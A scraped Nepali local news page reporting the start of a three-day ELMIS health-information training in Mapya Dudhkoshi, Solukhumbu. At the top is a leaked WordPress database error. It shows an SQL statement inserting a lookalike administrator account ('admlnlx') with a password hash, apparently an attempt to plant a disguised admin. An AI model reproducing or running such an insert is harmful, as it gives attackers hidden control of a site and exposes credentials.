WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bd8z.110Rh8Hu9GkU1hN154621Ej3h0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 07:11:13', '', 'admlnlx', 'admlnlx')

माप्यमा तीन दिने इएलएमआइएस सम्बन्धी तालिम सुरु – Gaule Khabar

माप्यमा तीन दिने इएलएमआइएस सम्बन्धी तालिम सुरु

माप्यमा तीन दिने इएलएमआइएस सम्बन्धी तालिम सुरु

सोलुखुम्बु । माप्य दुधकोशि गाउँपालिका र खुम्बु पासाङ ल्यामु गाउँपालिकाको संयुक्त आयोजना इएलएमआइएस (ELMIS) सम्बन्धी तीन दिने तालिम शुरु भएको छ ।

माप्य दुधकोशी गाउँपालिकाको सभाहलमा आजबाट सन्चालन भएको तालिमामा माप्य दुधकोशी गाउँपालिकाका उपाध्यक्ष गौरब राईले उद्वघाटन गर्नुभएको हो ।

गाउँपालिका भित्र रहेका स्वास्थ्य सस्थालाई सुचना प्रबिधिको पहुचमा पुर्‍याई एकीकृत स्वास्थ सूचना प्रणाली सुधृढीकरण गर्ने र स्वास्थ्य सस्थामा भएका गतिबिधि, डाटालाई बिधुतिय प्रणालिमा चुस्तदुरुस्त राख्न सहयोग मिल्ने गाउँपालिकाले जनाएको छ ।

कार्यक्रममा माप्य दुधकोशि गाउँपालिकाबाट ९ जना र खुम्बु पासाङ ल्यामु गाउँपालिकाबाट ६ जना सहभागी भएको माप्य दुधकोशी गाउँपालिका नि प्रशासकीय प्रमुख जितेन्द्र यादबले जानकारी दिए । ?

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका